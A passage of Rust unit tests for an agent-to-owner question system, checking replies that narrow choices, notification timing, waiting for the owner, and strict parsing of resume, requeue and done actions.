2668        assert!(open.thread.is_empty(), "a refused turn leaves no trace");
2669    }
2670
2671    #[test]
2672    fn a_reply_replaces_the_choices_and_moves_the_ball_back_to_the_owner() {
2673        let mut q = choice_question();
2674        q.say("SQLite or Redis, but what about disk space?")
2675            .unwrap();
2676        assert!(q.waiting_on_agent());
2677
2678        q.reply(
2679            "SQLite: it is one file, no server to run.",
2680            vec!["SQLite".to_owned()],
2681        )
2682        .unwrap();
2683
2684        assert_eq!(q.choices, ["SQLite"]);
2685        assert!(
2686            !q.waiting_on_agent(),
2687            "the agent spoke, so the owner is the one being waited on now"
2688        );
2689        assert_eq!(q.thread.len(), 2);
2690        assert_eq!(q.thread[1].who, Who::Agent);
2691
2692        // The new choice set is what a subsequent answer is checked against.
2693        assert!(q.answer(Answer::Choice("Redis".to_owned())).is_err());
2694        q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2695        assert_eq!(q.resolution().as_deref(), Some("SQLite"));
2696    }
2697
2698    #[test]
2699    fn notification_fires_for_the_first_ask_and_only_after_the_quiet_window_on_a_reply() {
2700        let mut fresh = choice_question();
2701        assert!(
2702            fresh.should_notify(Timestamp::now()),
2703            "nobody has been notified yet, so the first ask always pages"
2704        );
2705
2706        fresh.say("why not Postgres?").unwrap();
2707        let just_said = fresh.thread[0].at;
2708        assert!(
2709            !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(60)),
2710            "still on the screen a minute later; no need to page again"
2711        );
2712        assert!(
2713            !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(300)),
2714            "exactly the window: `>` means this side stays quiet"
2715        );
2716        assert!(
2717            fresh.should_notify(just_said + jiff::SignedDuration::from_secs(301)),
2718            "past the window: they may have walked away"
2719        );
2720    }
2721
2722    #[test]
2723    fn a_round_trip_of_turns_still_counts_as_one_open_question() {
2724        let (_dir, s) = store();
2725        let mut q = choice_question();
2726        s.put(&mut q).unwrap();
2727        q.say("why not Postgres?").unwrap();
2728        s.put(&mut q).unwrap();
2729        q.reply("no server to run", vec!["SQLite".to_owned()])
2730            .unwrap();
2731        s.put(&mut q).unwrap();
2732
2733        assert_eq!(
2734            s.count_open(),
2735            1,
2736            "one question that talked twice is still one open question"
2737        );
2738        assert_eq!(s.open_for(&q.run).len(), 1);
2739    }
2740
2741    #[tokio::test]
2742    async fn the_wait_returns_to_the_caller_when_the_owner_talks_back_without_deciding() {
2743        let (dir, s) = store();
2744        let mut q = choice_question();
2745        let id = q.id.clone();
2746        let writer = Questions::at(dir.path().join("questions"));
2747        let handle = tokio::spawn(async move {
2748            tokio::time::sleep(Duration::from_millis(30)).await;
2749            let mut fresh = writer.get(&id).expect("the question was filed first");
2750            fresh.say("why not Postgres?").unwrap();
2751            writer.put(&mut fresh).unwrap();
2752        });
2753
2754        let got = wait_for_owner(
2755            &mut q,
2756            &s,
2757            &quiet(),
2758            Duration::from_secs(5),
2759            Duration::from_millis(10),
2760        )
2761        .await
2762        .unwrap();
2763
2764        handle.await.unwrap();
2765        assert_eq!(got, Wait::Replied("why not Postgres?".to_owned()));
2766        assert_eq!(
2767            q.status,
2768            QuestionStatus::Open,
2769            "talking back is not a decision; the question stays open"
2770        );
2771        assert!(q.answer.is_none());
2772    }
2773
2774    #[test]
2775    fn a_say_that_lands_before_the_agents_reply_stays_unread() {
2776        let mut q = choice_question();
2777        q.say("A").unwrap();
2778        q.delivered_turns = q.thread.len();
2779        q.say("B").unwrap();
2780        q.reply("about A", vec![]).unwrap();
2781        assert_eq!(q.unread_from_owner().as_deref(), Some("B"));
2782        q.delivered_turns = q.thread.len();
2783        assert_eq!(q.unread_from_owner(), None);
2784    }
2785
2786    #[test]
2787    fn action_specs_parse_strictly_and_must_name_an_offered_choice() {
2788        let choices = vec!["resume で続行する".to_owned(), "wait".to_owned()];
2789        let ok = parse_actions(
2790            &[
2791                "resume で続行する=resume".to_owned(),
2792                "wait=done".to_owned(),
2793            ],
2794            &choices,
2795            "run-1",
2796        )
2797        .unwrap();
2798        assert_eq!(
2799            ok["resume で続行する"],
2800            ChoiceAction::Resume {
2801                run: "run-1".into()
2802            }
2803        );
2804        assert_eq!(ok["wait"], ChoiceAction::Done);
2805
2806        let named = ChoiceAction::parse("x=resume:abcd", "").unwrap();
2807        assert_eq!(named.1, ChoiceAction::Resume { run: "abcd".into() });
2808        assert_eq!(
2809            ChoiceAction::parse("x=requeue", "").unwrap().1,
2810            ChoiceAction::Requeue
2811        );
2812
2813        for bad in [
2814            "no-equals",
2815            "=done",
2816            "x=resume",
2817            "x=resume:",
2818            "x=explode",
2819            "x=done:1",
2820        ] {
2821            assert!(ChoiceAction::parse(bad, "").is_err(), "{bad}");
2822        }
2823        assert!(parse_actions(&["ghost=done".to_owned()], &choices, "").is_err());
2824        assert!(
2825            parse_actions(
2826                &["wait=done".to_owned(), "wait=requeue".to_owned()],
2827                &choices,
2828                ""
2829            )
2830            .is_err()
2831        );
2832    }
2833
2834    #[test]
2835    fn only_a_chosen_label_with_an_action_is_actionable() {
2836        let mut q = choice_question();
2837        q.choices = vec!["resume".to_owned(), "SQLite".to_owned()];
2838        q.actions.insert("SQLite".to_owned(), ChoiceAction::Requeue);
2839        assert!(q.chosen_action().is_none(), "unanswered");
2840        q.answer(Answer::Choice("resume".to_owned())).unwrap();
2841        assert!(
2842            q.chosen_action().is_none(),
2843            "a label that merely reads like an action does nothing"
2844        );
2845
2846        let mut q2 = choice_question();
2847        q2.choices = vec!["SQLite".to_owned()];
2848        q2.actions
2849            .insert("SQLite".to_owned(), ChoiceAction::Requeue);
2850        q2.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2851        assert_eq!(q2.chosen_action(), Some(&ChoiceAction::Requeue));
2852    }
2853
2854    #[test]
2855    fn a_reply_drops_actions_whose_choice_is_gone_and_old_files_read_without_actions() {
2856        let mut q = choice_question();
2857        q.choices = vec!["A".to_owned(), "B".to_owned()];
2858        q.actions.insert("A".to_owned(), ChoiceAction::Done);
2859        q.actions.insert("B".to_owned(), ChoiceAction::Requeue);
2860        q.reply("narrowing", vec!["B".to_owned()]).unwrap();
2861        assert_eq!(q.actions.len(), 1);
2862        assert!(q.actions.contains_key("B"));
2863
2864        let mut v = serde_json::to_value(&q).unwrap();
2865        v.as_object_mut().unwrap().remove("actions");
2866        let old: Question = serde_json::from_value(v).unwrap();
2867        assert!(old.actions.is_empty());
2868    }
2869}